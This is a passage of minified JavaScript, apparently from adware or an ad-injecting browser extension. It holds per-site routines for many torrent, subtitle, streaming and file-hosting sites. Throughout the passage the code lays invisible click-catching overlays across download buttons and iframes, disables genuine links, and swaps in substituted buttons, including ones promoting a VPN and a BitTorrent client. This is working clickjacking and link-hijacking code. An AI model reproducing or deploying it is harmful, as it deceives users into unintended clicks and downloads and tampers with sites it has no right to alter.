t=document.links[k].parentNode;if(!(-1<t.className.indexOf(\"addthis_toolbox\"))){t.style.position=\"relative\";var r=document.createElement(\"div\");r.style.position=\"absolute\";r.style.left=0;r.style.top=0;r.style.width=\"100%\";r.style.height=\"100%\";r.style.zIndex=\"9999\";r.style.cursor=\"pointer\";t.appendChild(r)}}}catch(u){}l=document.getElementsByTagName(\"iframe\");for(k=0;k<l.length;k++)try{-1==l[k].src.indexOf(\"acebook.co\")&&-1==l[k].src.indexOf(\"cp.crwdcntrl.ne\")&&\n(t=l[k].parentNode,t.style.position=\"relative\",r=document.createElement(\"div\"),r.style.position=\"absolute\",r.style.left=0,r.style.top=0,r.style.width=\"100%\",r.style.height=\"100%\",r.style.zIndex=\"9999\",r.style.cursor=\"pointer\",r.id=k,t.appendChild(r))}catch(w){}}20<h&&clearInterval(e)},500)}};this[\"pensubtitles.us\"]=new function(){this.init=function(){if(-1<window.location.href.indexOf(\"/opensubtitles-playe\")){var h=document.getElementById(\"divPlayerDesc\");if(null!=h){h.style.position=\"relative\";var e=\ndocument.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.zIndex=\"2000\";h.appendChild(e);if(h=h.children[0]){var k=h.children[0];k&&(k.setAttribute(\"href\",\"javascript:void(0);\"),k.setAttribute(\"target\",\"_self\"))}}h=document.getElementById(\"divPlayerHead\");if(null!=h)for(var l=0;l<h.children.length;l++)if(\"span\"==h.children[l].tagName.toLowerCase()){var m=h.children[l],e=document.createElement(\"div\");e.style.position=\n\"absolute\";e.style.width=\"106%\";e.style.height=\"70px\";e.style.cursor=\"pointer\";e.style.top=\"-50px\";e.style.left=\"-6%\";e.style.zIndex=\"2000\";if(k=m.children[0])k.setAttribute(\"href\",\"javascript:void(0);\"),k.setAttribute(\"target\",\"_self\");m.style.position=\"relative\";m.appendChild(e)}}}};this[\"opensubtitles.org\"]=new function(){this.init=function(){new function(){var h=document.getElementById(\"scrubbuad\");h&&(h.style.zIndex=\"15\",f=document.createElement(\"div\"),f.style.zIndex=\"15000\",f.style.right=\"9px\",\nf.style.bottom=\"0\",f.style.position=\"fixed\",f.style.padding=\"0\",f.style.margin=\"0 0 30px 0\",f.style.width=\"220px\",f.style.height=\"72px\",f.style.overflow=\"visible\",f.style.cursor=\"pointer\",document.getElementsByTagName(\"body\")[0].firstChild.appendChild(f));var e=n.utils.query_selector_all('div[style=\"clear: both;\"] fieldset table[style=\"width:100%;\"] td');0==e.length&&(e=n.utils.query_selector_all('div[style=\"clear: both;\"] fieldset table[style=\"width: 100%;\"] td'));for(h=0;h<e.length;h++){var k=n.utils.duplicateElement(e[h]),\nl=e[h].parentNode;l.insertBefore(k,e[h]);l.removeChild(e[h])}e=n.utils.query_selector_all('div[style=\"margin-left: 110px;\"] fieldset div[style=\"text-align: left\"] a');0==e.length&&(e=n.utils.query_selector_all('div[style=\"margin-left: 110px;\"] fieldset div[style=\"text-align: left;\"] a'));for(h=0;h<e.length;h++)k=n.utils.duplicateElement(e[h]),l=e[h].parentNode,l.insertBefore(k,e[h]),l.removeChild(e[h]);e=n.utils.query_selector_all('div[style=\"clear: both;\"] fieldset table[style=\"width:100%;border-spacing: 1px;\"] td');\n0==e.length&&(e=n.utils.query_selector_all('div[style=\"clear: both;\"] fieldset table[style=\"width: 100%; border-spacing: 1px;\"] td'));for(h=0;h<e.length;h++)k=n.utils.duplicateElement(e[h]),l=e[h].parentNode,l.insertBefore(k,e[h]),l.removeChild(e[h])}}};this[\"romptfile.co\"]=new function(){this.init=function(){if(-1<location.host.toLowerCase().indexOf(\"romptfile.co\")){for(var h={},e=document.getElementsByTagName(\"iframe\"),k=0;k<e.length;k++)\"300\"==e[k].getAttribute(\"width\")&&\"250\"==e[k].getAttribute(\"height\")&&\n(h=e[k].parentNode);h.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.width=\"100%\";d.style.height=\"255px\";d.style.cursor=\"pointer\";d.style.top=\"0\";d.style.zIndex=\"2000\";h.appendChild(d)}}};this[\"pensoftwareupdater.co\"]=new function(){this.init=function(){new function(){if(-1<window.location.host.toLowerCase().indexOf(\"pensoftwareupdater.co\"))if(\"undefined\"!==typeof $)window.__qqcount=0,window.__qqint=setInterval(function(){var h=$(\".download\").parent();\nh.css(\"position\",\"relative\");var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.zIndex=\"2000\";e.style.height=\"100%\";e.style.width=\"122px\";e.style.right=\"0\";e.style.top=\"0\";e.style.cursor=\"pointer\";h.append(e);h=$(\"#addBoxX\").parent();h.css(\"position\",\"relative\");e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.zIndex=\"2000\";e.style.height=\"45px\";e.style.width=\"101px\";e.style.right=\"22px\";e.style.bottom=\"16px\";e.style.cursor=\"pointer\";h.append(e);window.__qqcount++;\n10<window.__qqcount&&clearInterval(window.__qqint)},250);else for(var h=document.links,e={},k={},l=0;l<h.length;l++)e=h[l].getAttribute(\"href\"),null!=e&&-1<e.toLowerCase().indexOf(\"pensoftwareupdater.com/idownloader.ph\")&&(e=h[l].getAttribute(\"id\"),null!=e&&\"addBoxX\"==e?(k=h[l].parentNode,k.style.position=\"relative\",e=document.createElement(\"div\"),e.style.position=\"absolute\",e.style.zIndex=\"2000\",e.style.height=\"45px\",e.style.width=\"101px\",e.style.right=\"22px\",e.style.bottom=\"16px\"):(k=h[l].parentNode,\nk.style.position=\"relative\",e=document.createElement(\"div\"),e.style.position=\"absolute\",e.style.zIndex=\"2000\",e.style.height=\"100%\",e.style.width=\"122px\",e.style.right=\"0\",e.style.top=\"0\"),e.style.cursor=\"pointer\",k.appendChild(e))}}};this[\"veehd.com\"]=new function(){this.init=function(){new function(){if(-1<window.location.href.indexOf(\"veehd.com/video/\")){var h=document.getElementsByTagName(\"iframe\")[0],e={};null!=h&&(h=h.parentNode,e=document.createElement(\"div\"),e.style.top=\"0\",e.style.width=\n\"100%\",e.style.height=\"100%\",e.style.cursor=\"pointer\",e.style.zIndex=\"2000\",e.style.position=\"absolute\",h.style.position=\"relative\",h.appendChild(e));h=document.getElementById(\"preview\");null!=h&&(e=document.createElement(\"div\"),e.style.top=\"0\",e.style.width=\"100%\",e.style.height=\"100%\",e.style.cursor=\"pointer\",e.style.zIndex=\"2000\",e.style.position=\"absolute\",h.style.position=\"relative\",h.appendChild(e))}else for(var e=document.getElementsByTagName(\"a\"),k=0;k<e.length;k++)if(\"getDownload();\"==e[k].getAttribute(\"onclick\")){h=\ndocument.createElement(\"a\");h.style.cursor=\"pointer\";var l=document.createElement(\"img\");l.setAttribute(\"src\",e[k].children[0].getAttribute(\"src\"));l.setAttribute(\"border\",\"0\");h.appendChild(l);l=e[k].parentNode;l.removeChild(e[k]);e=l.getElementsByTagName(\"div\")[0];l.insertBefore(h,e);break}}}};this[\"ullypcgames.ne\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"ullypcgames.ne\"))for(var h=document.getElementsByTagName(\"center\"),e=0;e<h.length;e++){var k=h[e].firstChild;\n\"undefined\"!==typeof k.tagName&&\"a\"==k.tagName.toLowerCase()&&(h[e].style.position=\"relative\",k=document.createElement(\"div\"),k.style.position=\"absolute\",k.style.top=\"0\",k.style.left=\"0\",k.style.width=\"100%\",k.style.height=\"100%\",k.style.zIndex=\"2000\",k.style.cursor=\"pointer\",h[e].appendChild(k))}}};this[\"llplayer.com.b\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"llplayer.com.b\"))for(var h=document.getElementsByTagName(\"img\"),e=0;e<h.length;e++)if(h[e].getAttribute(\"src\")&&\n-1<h[e].getAttribute(\"src\").indexOf(\"fullpage_eng.png\")){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.position=\"absolute\";k.style.zIndex=\"9999\";k.style.top=\"0\";k.style.cursor=\"pointer\";var l=h[e].parentNode.parentNode;l.style.position=\"relative\";l.appendChild(k)}}};this[\"ubtitulosespanol.or\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"ubtitulosespanol.or\")){var h=document.links;for(i=0;i<h.length;i++)if(\"Descargue su subt\\u00edtulo aqu\\u00ed\"===\n(h[i].innerText?h[i].innerText:h[i].textContent)){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"ubtitles4free.ne\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"ubtitles4free.ne\")){var h=document.links;for(i=0;i<h.length;i++)if(\"Download Subtitle\"===(h[i].innerText?\nh[i].innerText:h[i].textContent)||\"Download Player\"===(h[i].innerText?h[i].innerText:h[i].textContent)){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"legendasbrasil.org\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"legendasbrasil.org\")){var h=document.links;\nfor(i=0;i<h.length;i++)if(\"Baixar Legenda\"===(h[i].innerText?h[i].innerText:h[i].textContent)||\"Baixar Player\"===(h[i].innerText?h[i].innerText:h[i].textContent)||\"Baixe sua legenda aqui\"===(h[i].innerText?h[i].innerText:h[i].textContent)){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"reeroms.co\"]=\nnew function(){this.init=function(){window.location.host.toLowerCase().indexOf(\"reeroms.co\")&&(window.__sdahfjkahfals3243Count=0,window.__sdahfjkahfals3243Int=setInterval(function(){for(var h=document.getElementsByTagName(\"a\"),e=0;e<h.length;e++){var k=\"undefined\"===typeof h[e].innerText?h[e].textContent:h[e].innerText,k=k.trim();if(\"Download\"===k||0==k.indexOf(\"Direct\")){var l=document.createElement(\"div\");l.style.width=\"100%\";l.style.height=\"100%\";l.style.position=\"absolute\";l.style.zIndex=\"9999\";\nl.style.top=\"0\";l.style.cursor=\"pointer\";var m=h[e].parentNode;m.style.position=\"relative\";m.appendChild(l);0==k.indexOf(\"Direct\")&&clearInterval(window.__sdahfjkahfals3243Int)}}40<window.__sdahfjkahfals3243Count++&&clearInterval(window.__sdahfjkahfals3243Int)},500))}};this[\"eneral-ebooks.co\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"eneral-ebooks.co\"))for(var h=document.getElementsByTagName(\"iframe\"),e=0;e<h.length;e++){var k=h[e].parentNode;if(null!=\nk){var l=k.getAttribute(\"class\");null!=l&&-1<l.indexOf(\"banner-body\")&&(l=document.createElement(\"div\"),l.style.width=\"100%\",l.style.height=\"100%\",l.style.position=\"absolute\",l.style.zIndex=\"9999\",l.style.top=\"0\",l.style.cursor=\"pointer\",k.style.position=\"relative\",k.appendChild(l))}}}};this[\"stream2watch.me\"]=new function(){this.init=function(){-1<location.host.toLowerCase().indexOf(\"stream2watch.me\")&&(window.__z_tream2count=0,window.__z_tream2int=setInterval(function(){20<window.__z_tream2count++&&\nclearInterval(window.__z_tream2int);var h=document.getElementById(\"rh_toolbar_STRTOPB\"),e=document.getElementById(\"rhfrm_STRTOPB\");if(null!=h&&null!=e){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"2000\";k.style.position=\"absolute\";h.appendChild(k);e.style.position=\"absolute\";e.style.zIndex=\"-1\";clearInterval(window.__z_tream2int)}},500))}};this[\"old_ki_ckass.to\"]=new function(){var h=this;h.init=function(){location.protocol+\n\"//\"+window.location.host+\"/\"!=window.location.href&&(h.counter=0,h.kickass=function(){20<++h.counter&&clearInterval(h.interval);var e=n.utils.query_selector_all(\".advertDownload\");if(0<e.length){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"2000\";k.style.position=\"absolute\";k.style.top=\"0\";k.style.left=\"0\";e[0].appendChild(k);e[0].style.position=\"relative\";e[0].style.overflow=\"hidden\";e=e[0].getElementsByTagName(\"a\");for(k=\n0;k<e.length;k++)e[k].setAttribute(\"href\",\"javascript:void(0);\"),e[k].setAttribute(\"onclick\",\"void(0);\");clearInterval(h.interval)}},h.interval=setInterval(h.kickass,500))}};this[\"kickass.to\"]=new function(){var h=this;h.init=function(){if(location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href){h.counter=0;h.___ZskskskCount=0;h.___ZskskskthisZ=function(){try{20<++h.___ZskskskCount&&clearInterval(h.___ZskskskInter);for(var e=document.getElementsByTagName(\"div\"),k=0;k<e.length;k++){var l=\ne[k].getAttribute(\"align\");if(l&&\"center\"==l){var m=e[k].children[0];if(m&&m.getAttribute&&\"siteButton giantButton\"==m.getAttribute(\"class\")){var n=document.createElement(\"a\");n.style.fontSize=\"20px\";n.style.textAlign=\"center\";n.style.marginBottom=\"5px\";n.className=\"siteButton giantButton\";var p=document.createElement(\"span\");p.innerText?p.innerText=\"Protect yourself now with hide.me VPN\":p.textContent=\"Protect yourself now with hide.me VPN\";n.appendChild(p);e[k].removeChild(m);e[k].appendChild(n);\nclearInterval(h.___ZskskskInter)}}}}catch(v){clearInterval(h.___ZskskskInter)}};h.___ZskskskInter=setInterval(h.___ZskskskthisZ,500);for(var e=n.utils.query_selector_all(\".partner1Button.idownload.icon16\"),k=0;k<e.length;k++){var l=e[k].nextSibling,m=document.createElement(\"a\");m.className=\"partner1Button idownload icon16\";m.setAttribute(\"href\",\"#\");var p=document.createElement(\"span\");m.appendChild(p);p=e[k].parentNode;l?p.insertBefore(m,l):p.appendChild(m);p.removeChild(e[k])}h.counter=0;h.kickassx=\nfunction(){20<++h.counter&&clearInterval(h.interval);0<n.utils.query_selector_all(\"div#vuzeDownload a\").length&&(document.getElementById(\"vuzeDownload\").parentNode.innerHTML='<div id=\"vuzeDownload\">To download this torrent, you need a BitTorrent client: <a href=\"#\">Bitlord</a></div>',clearInterval(h.interval))};h.interval=setInterval(h.kickassx,500);h.counterClick=0;h.kickassClick=function(){20<++h.counterClick&&clearInterval(h.interval2);var e=n.utils.query_selector_all(\".block.botmarg5px\")[0];e&&\n\"Download faster CLICK HERE\"==(e.innerText?e.innerText:e.textContent)&&(e.innerHTML='<div class=\"block botmarg5px\">Download faster <a href=\"#\">CLICK HERE</a></div>',clearInterval(h.interval2))};h.interval2=setInterval(h.kickassClick,500)}}};this[\"kickass.so\"]=new function(){var h=this;h.init=function(){if(location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href){h.counter=0;h.___ZskskskCount=0;h.___ZskskskthisZ=function(){try{20<++h.___ZskskskCount&&clearInterval(h.___ZskskskInter);for(var e=\ndocument.getElementsByTagName(\"div\"),k=0;k<e.length;k++){var l=e[k].getAttribute(\"align\");if(l&&\"center\"==l){var m=e[k].children[0];if(m&&m.getAttribute&&\"siteButton giantButton\"==m.getAttribute(\"class\")){var n=document.createElement(\"a\");n.style.fontSize=\"20px\";n.style.textAlign=\"center\";n.style.marginBottom=\"5px\";n.className=\"siteButton giantButton\";var p=document.createElement(\"span\");p.innerText?p.innerText=\"Protect yourself now with hide.me VPN\":p.textContent=\"Protect yourself now with hide.me VPN\";\nn.appendChild(p);e[k].removeChild(m);e[k].appendChild(n);clearInterval(h.___ZskskskInter)}}}}catch(v){clearInterval(h.___ZskskskInter)}};h.___ZskskskInter=setInterval(h.___ZskskskthisZ,500);for(var e=n.utils.query_selector_all(\".partner1Button.idownload.icon16\"),k=0;k<e.length;k++){var l=e[k].nextSibling,m=document.createElement(\"a\");m.className=\"partner1Button idownload icon16\";m.setAttribute(\"href\",\"#\");var p=document.createElement(\"span\");m.appendChild(p);p=e[k].parentNode;l?p.insertBefore(m,l):\np.appendChild(m);p.removeChild(e[k])}h.counter=0;h.kickassx=function(){20<++h.counter&&clearInterval(h.interval1);0<n.utils.query_selector_all(\"div#vuzeDownload a\").length&&(document.getElementById(\"vuzeDownload\").parentNode.innerHTML='<div id=\"vuzeDownload\">To download this torrent, you need a BitTorrent client: <a href=\"#\">Bitlord</a></div>',clearInterval(h.interval1))};h.interval1=setInterval(h.kickassx,500);h.counterClick=0;h.kickassClick=function(){20<++h.counterClick&&clearInterval(h.interval2);\nvar e=n.utils.query_selector_all(\".block.botmarg5px\")[0];e&&\"Download faster CLICK HERE\"==(e.innerText?e.innerText:e.textContent)&&(e.innerHTML='<div class=\"block botmarg5px\">Download faster <a href=\"#\">CLICK HERE</a></div>',clearInterval(h.interval2))};h.interval2=setInterval(h.kickassClick,500)}}};this[\"uploadrocket.net\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".dlbutton_green\");if(h&&0<h.length){var h=h[0],e=document.createElement(\"a\");e.className=\"dlbutton_green\";\ne.setAttribute(\"href\",\"javascript:void(0)\");var k=document.createElement(\"span\");k.innerText?k.innerText=\"Download Now\":k.textContent=\"Download Now\";e.appendChild(k);k=h.parentNode;k.removeChild(h);k.appendChild(e)}(h=n.utils.query_selector_all(\".middle\"))&&0<h.length&&(h=h[0].children[4])&&h.setAttribute(\"href\",\"javascript:void(0);\");if((h=n.utils.query_selector_all(\"#ID_freeorpremium table tr td a\"))&&0<h.length)for(e=0;e<h.length;e++)h[e].setAttribute(\"href\",\"javascript:void(0);\");(h=n.utils.query_selector_all(\"#ID_freeorpremium input[type='submit']\"))&&\n0<h.length&&h[0].setAttribute(\"type\",\"button\");(h=n.utils.query_selector_all(\"#ID_freeorpremium\"))&&0<h.length&&(h=h[0])&&(h.style.position=\"relative\",e=document.createElement(\"div\"),e.style.position=\"absolute\",e.style.width=\"100%\",e.style.height=\"95px\",e.style.zIndex=\"2000\",e.style.top=\"0\",e.style.cursor=\"pointer\",h.appendChild(e))}};this[\"programas-gratis.net\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".list.new .download_button\"),e=0;e<h.length;e++){var k=h[e].parentNode;\nk.style.position=\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"124px\";l.style.height=\"42px\";l.style.zIndex=\"2000\";l.style.top=\"44px\";l.style.right=\"9px\";l.style.cursor=\"pointer\";k.appendChild(l);h[e].setAttribute(\"href\",\"javascript:void(0)\")}}};this[\"programasgratis.es\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\"#bloque_top_portada .programa_top_portada a\"),e=0;e<h.length;e++)if(h[e].setAttribute(\"href\",\"javascript:void(0)\"),\n\"rojo\"!=h[e].className){var k=h[e].parentNode;k.style.position=\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"100%\";l.style.height=\"152px\";l.style.zIndex=\"2000\";l.style.top=\"0\";l.style.right=\"0\";l.style.cursor=\"pointer\";k.appendChild(l)}h=n.utils.query_selector_all(\".bloque_novedades .link_categoria_descargar\");for(e=0;e<h.length;e++)k=h[e].parentNode,k.style.position=\"relative\",l=document.createElement(\"span\"),l.style.position=\"absolute\",l.style.width=\n\"124px\",l.style.height=\"42px\",l.style.zIndex=\"2000\",l.style.top=\"-5px\",l.style.right=\"0\",l.style.cursor=\"pointer\",k.appendChild(l),h[e].setAttribute(\"href\",\"javascript:void(0)\")}};this[\"programasejogos.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".enlace_pestania_descargar\"),e=0;e<h.length;e++){var k=h[e].parentNode;k.style.position=\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"200px\";l.style.height=\"90px\";l.style.zIndex=\n\"2000\";l.style.top=\"65px\";l.style.right=\"0\";l.style.cursor=\"pointer\";k.appendChild(l);h[e].setAttribute(\"href\",\"javascript:void(0)\")}h=[];h=h.concat(n.utils.query_selector_all(\".linea_fondo1 .enlace_pestania_descargar_pequeno\"));h=h.concat(n.utils.query_selector_all(\".linea_fondo1 .boton_clase_listado\"));h=h.concat(n.utils.query_selector_all(\".linea_fondo .enlace_pestania_descargar_pequeno\"));for(e=0;e<h.length;e++)for(var m=0;m<h[e].length;m++)k=h[e][m].parentNode,k.style.position=\"relative\",l=document.createElement(\"span\"),\nl.style.position=\"absolute\",l.style.width=\"115px\",l.style.height=\"28px\",l.style.zIndex=\"2000\",l.style.top=\"0\",l.style.right=\"0\",l.style.cursor=\"pointer\",k.appendChild(l),h[e][m].setAttribute(\"href\",\"javascript:void(0)\");h=n.utils.query_selector_all(\".pyj_registro_inferior .enlace_pestania_descargar_pequeno\");for(e=0;e<h.length;e++)k=h[e].parentNode,k.style.position=\"relative\",l=document.createElement(\"span\"),l.style.position=\"absolute\",l.style.width=\"105px\",l.style.height=\"29px\",l.style.zIndex=\"2000\",\nl.style.top=\"3px\",l.style.right=\"-4px\",l.style.cursor=\"pointer\",k.appendChild(l),h[e].setAttribute(\"href\",\"javascript:void(0)\")}};this[\"uploading.com\"]=new function(){this.init=function(){if(window.self===window.top&&location.host.toLowerCase().indexOf(\"ploading.com/files/\"))for(var h=typeof document.querySelectorAll?document.getElementsByTagName(\"div\"):document.querySelectorAll(\"div.method_title\"),e=0;e<h.length;e++){var k=h[e].className;k&&\"undefined\"!==typeof k&&-1<k.indexOf(\"method_title\")&&(k=\nh[e].getAttribute(\"onclick\"))&&\"undefined\"!==typeof k&&-1<k.indexOf(\"location.href\")&&(h[e].setAttribute(\"onclick\",\"void(0);\"),k=h[e].cloneNode(!0),h[e].parentNode.replaceChild(k,h[e]),k.setAttribute(\"onclick\",\"void(0);\"))}setTimeout(function(){var e=n.utils.query_selector_all(\".method_title\")[0];if(e){var h=e.parentNode,k=document.createElement(\"div\");k.className=\"method_title\";var q=document.createElement(\"i\"),t=document.createElement(\"span\");t.setAttribute(\"id\",\"timer_count\");t.innerText=\"Download for free\";\nt.textContent=\"Download for free\";k.appendChild(q);k.appendChild(t);h.insertBefore(k,e);h.removeChild(e)}},1E3)}};this[\"flexydrive.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"file21desktop.com\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"media1fire.com\"]=new function(){this.init=function(){var h=n.utils.query_selector_all('input[name=\"adcopy_response\"]');\n0<h.length&&(h[0].disabled=!0);for(h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"file21desktop.com\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"softwareandgames.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"softwareandgames.com/download\")){var k=n.utils.duplicateElement(e),l=e.parentNode;\nl.insertBefore(k,e);l.removeChild(e)}}}};this[\"programmesetjeux.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"programmesetjeux.com/telecharger\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"baixarjogos.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<\nk.indexOf(\"baixarjogos.com/baixar\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"descargarjuegos.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"descargarjuegos.com/descargar\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"hotfiles.ro\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=\ndocument.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"hotfil.es/goref.php\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"vitanclub.net\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".pdld\")[0],e=n.utils.duplicateElement(h),k=h.parentNode;k.insertBefore(e,h);k.removeChild(h);h=document.getElementById(\"container_bottom\");n.utils.coverElement(h)}};this[\"mirrorcreator.com\"]=new function(){this.init=function(){for(var h=\n0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&(-1<k.indexOf(\"getsecuredfiles.com/mirrorc\")||-1<k.indexOf(\"westzip.in/\"))){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"mestorrents.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"pubted.com/www/delivery/\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,\ne);l.removeChild(e)}}}};this[\"vitorrent.net\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"/file.php\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"uploaded.net\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".free\")[0];if(\"undefined\"!==typeof h){var e=n.utils.duplicateElement(h);e.style.border=\"none\";var k=h.parentNode;k.insertBefore(e,\nh);k.removeChild(h)}h=n.utils.query_selector_all(\"#download .center\")[0];\"undefined\"!==typeof h&&n.utils.coverElement(h,void 0,\"130px\",void 0,void 0,void 0,void 0,!1)}};this[\"newsinitiative.org\"]=new function(){var h=this;h.init=function(){h.counter=0;h.interval=setInterval(function(){var e=n.utils.query_selector_all(\"noscript\")[1].parentNode;if(\"undefined\"!==typeof e){if(30>h.counter++){var k=e.children[0];if(\"undefined\"!==typeof k&&-1<k.getAttribute(\"src\").indexOf(\"data:image/\"))return}clearInterval(h.interval);\nvar k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}},500);var e=n.utils.query_selector_all(\".download-link a\");if(\"undefined\"!==typeof e)for(var k=0;k<e.length;k++){var l=n.utils.duplicateElement(e[k]),m=e[k].parentNode;m.insertBefore(l,e[k]);m.removeChild(e[k])}e=n.utils.query_selector_all(\".ads3 a\")[0];\"undefined\"!==typeof e&&(k=n.utils.duplicateElement(e),m=e.parentNode,m.insertBefore(k,e),m.removeChild(e))}};this[\"megafilmesonlinehd.com\"]=new function(){this.init=\nfunction(){var h=n.utils.query_selector_all(\"#ClickHere\")[0];if(\"undefined\"!==typeof h){var e=n.utils.duplicateElement(h),k=h.parentNode;k.insertBefore(e,h);k.removeChild(h)}}};this[\"mycoolmp3.com\"]=new function(){var h=this;h.init=function(){h.interval=setInterval(function(){if(\"undefined\"!==typeof n.utils.query_selector_all(\".downButtons\")[0]){var e=n.utils.query_selector_all(\".downButtons a\");if(!(2>e.length)&&(e=e[1],\"undefined\"!==typeof e)){var h=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(h,\ne);l.removeChild(e)}}},500)}};this[\"descargadictos.net\"]=new function(){var h=this;h.init=function(){h.counter=0;h.interval=setInterval(function(){var e=n.utils.query_selector_all(\".content\")[0].children[1];if(\"undefined\"!==typeof e){if(30>h.counter++){var k=e.firstChild;if(\"undefined\"!==typeof k&&-1<k.getAttribute(\"src\").indexOf(\"data:image/\"))return}clearInterval(h.interval);var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}},500);var e=n.utils.query_selector_all('[rel=\"nofollow\"]')[0];\nif(\"undefined\"!==typeof e){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}};this[\"toggle.com\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".downloadLink.newDownloadLink a\")[0];if(\"undefined\"!==typeof h){var e=n.utils.duplicateElement(h),k=h.parentNode;k.insertBefore(e,h);k.removeChild(h)}}};this[\"downloadshareware.com\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\"a#ads\")[0];if(\"undefined\"!==typeof h){var e=\nn.utils.duplicateElement(h),k=h.parentNode;k.insertBefore(e,h);k.removeChild(h)}}};this[\"primewire.ag\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".quality_hd\");if(\"undefined\"!==typeof h)for(var e=0;e<h.length;e++){var k=h[e].parentNode.parentNode.children[1].children[0].children[0],l=n.utils.duplicateElement(k),m=k.parentNode;l.className=\"\";m.insertBefore(l,k);m.removeChild(k)}h=n.utils.query_selector_all(\".download_now_mouseover.no_c_link\")[0];\"undefined\"!==typeof h&&\n(l=n.utils.duplicateElement(h),m=h.parentNode,l.className=l.className.replace(\"no_c_link\",\"\"),m.insertBefore(l,h),m.removeChild(h));h=n.utils.query_selector_all(\".download_link .no_c_link\")[0];\"undefined\"!==typeof h&&(l=n.utils.duplicateElement(h),m=h.parentNode,l.className=l.className.replace(\"no_c_link\",\"\"),m.insertBefore(l,h),m.removeChild(h))}};this[\"ads.showmeflix.com\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".big-play\")[0];if(\"undefined\"!==typeof h){var 